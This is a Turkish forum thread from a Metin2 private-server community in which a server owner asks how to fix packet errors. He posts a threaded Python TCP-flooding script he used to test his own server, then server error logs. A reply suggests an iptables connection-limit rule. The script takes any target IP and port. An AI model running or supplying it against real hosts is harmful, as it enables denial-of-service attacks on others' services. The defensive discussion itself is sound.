mavzermete 1
mavzermete
Bvural41 1
Bvural41
Fethi Polat 1
Fethi Polat
Mt2Hizmet 1
Mt2Hizmet
Sevdamsın 1
Sevdamsın
Nedved35 1
Nedved35
Hikaye Ekle

Cevaplanmadı Ddos veya Packet Saldırıları Hakkında

  • Konuyu başlatan Konuyu başlatan athenoraproject
  • Başlangıç tarihi Başlangıç tarihi
  • Cevaplar Cevaplar 12
  • Görüntüleme Görüntüleme 1K

Ayyıldız2 | 2008 TR Yapısı • 1-99 Orta Emek Destan • Oto Avsız • 10 Temmuz 21:00 HEMEN TIKLA!

Arkadaşlar merhaba dün martysama altyapısı kullandığım oyunda ddos ve packet saldırıları hakkında araştırma yaparken bir sorun buldum
Kod:
# -*- coding: utf-8 -*-
import socket
import threading
import time
import os

def send_tcp_packets(ip, port, data_size, thread_id):
    data = os.urandom(data_size)
    while True:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((ip, port))
            sock.sendall(data)
            print("[Thread-{}] Gonderildi {} byte {}:{}".format(thread_id, data_size, ip, port))
            sock.close()
        except Exception as e:
            print("[Thread-{}] Hata: {}".format(thread_id, e))
        time.sleep(0.1)

if __name__ == "__main__":
    ip = input("Hedef IP: ")
    port = int(input("Hedef Port: "))
    data_size = int(input("Gonderilecek veri boyutu (byte): "))
    thread_count = int(input("Kac paralel baglanti acsin?: "))

    threads = []
    for i in range(thread_count):
        t = threading.Thread(target=send_tcp_packets, args=(ip, port, data_size, i + 1))
        t.daemon = True
        t.start()
        threads.append(t)

    print("{} thread ile {}:{} hedefi test edilmeye baslandi. Ctrl+C ile durdurabilirsin.".format(thread_count, ip, port))

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("Test durduruldu.")

Yukarıda verdiğim python scriptidir sunucunun ip ve channel portlarını girdiğiniz zaman
ddos veya packet verileri gönderiyor tam emin değilim


Ancak bu saldırılar kuvvetli kalıyor ki
Kod:
SYSERR: May 20 19:39:19 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:22 :: Process: UNKNOWN HEADER: 179, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 21
SYSERR: May 20 19:39:23 :: Process: UNKNOWN HEADER: 178, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:24 :: Process: UNKNOWN HEADER: 108, LAST HEADER: 10(1), REMAIN BYTES: 5839, fd: 21
SYSERR: May 20 19:39:24 :: pid_init:
Start of pid: 1105

SYSERR: May 20 19:39:24 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:25 :: Analyze: Handshake phase does not handle packet 241 (fd 21)
SYSERR: May 20 19:39:25 :: Process: UNKNOWN HEADER: 147, LAST HEADER: 241(67), REMAIN BYTES: 4313, fd: 21
SYSERR: May 20 19:39:26 :: Process: UNKNOWN HEADER: 199, LAST HEADER: 0(0), REMAIN BYTES: 1460, fd: 21
SYSERR: May 20 19:39:29 :: Analyze: Handshake phase does not handle packet 75 (fd 20)
SYSERR: May 20 19:39:29 :: Process: UNKNOWN HEADER: 201, LAST HEADER: 254(1), REMAIN BYTES: 1452, fd: 20
SYSERR: May 20 19:39:29 :: pid_init:
Start of pid: 1110

SYSERR: May 20 19:39:29 :: socket_bind: bind: Address already in use
SYSERR: May 20 19:39:29 :: Process: UNKNOWN HEADER: 173, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:30 :: Process: UNKNOWN HEADER: 99, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:30 :: Process: UNKNOWN HEADER: 179, LAST HEADER: 0(0), REMAIN BYTES: 5840, fd: 20
SYSERR: May 20 19:39:32 :: socket_accept: accept: Software caused connection abort (fd 12)
SYSERR: May 20 19:39:32 :: Analyze: Handshake phase does not handle packet 30 (fd 20)
SYSERR: May 20 19:39:32 :: Process: UNKNOWN HEADER: 240, LAST HEADER: 0(1), REMAIN BYTES: 1393, fd: 20
SYSERR: May 20 19:39:34 :: pid_init:
Start of pid: 1119

Böyle paket hataları alıyorum sysser syslog şişiyor böylelikle bu konu hakkında fikri olan yazabilir mi fixi nedir?



 
En sağlam savunma dışarıdan gelen saldırıları sunucuya ulaşmadan engellemektir:
iptables örneği (terminaline yaz):
iptables -A INPUT -p tcp --dport 13000 -m connlimit --connlimit-above 20 -j DROP
13000 yerine channel portlarını yaz. Bu kural, aynı IP’den 20’den fazla bağlantı kuranları engeller
eğer oyuncuysa ve oyunun açilişi sirasinda 20 defa login olmayı denerse ip ban yiycek ve o oyuncu bir daha giremiycek ipban listesini temizlemiycek freebsd otomatik olarak belirli bir süre sonra ?
 

Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)

Geri
Üst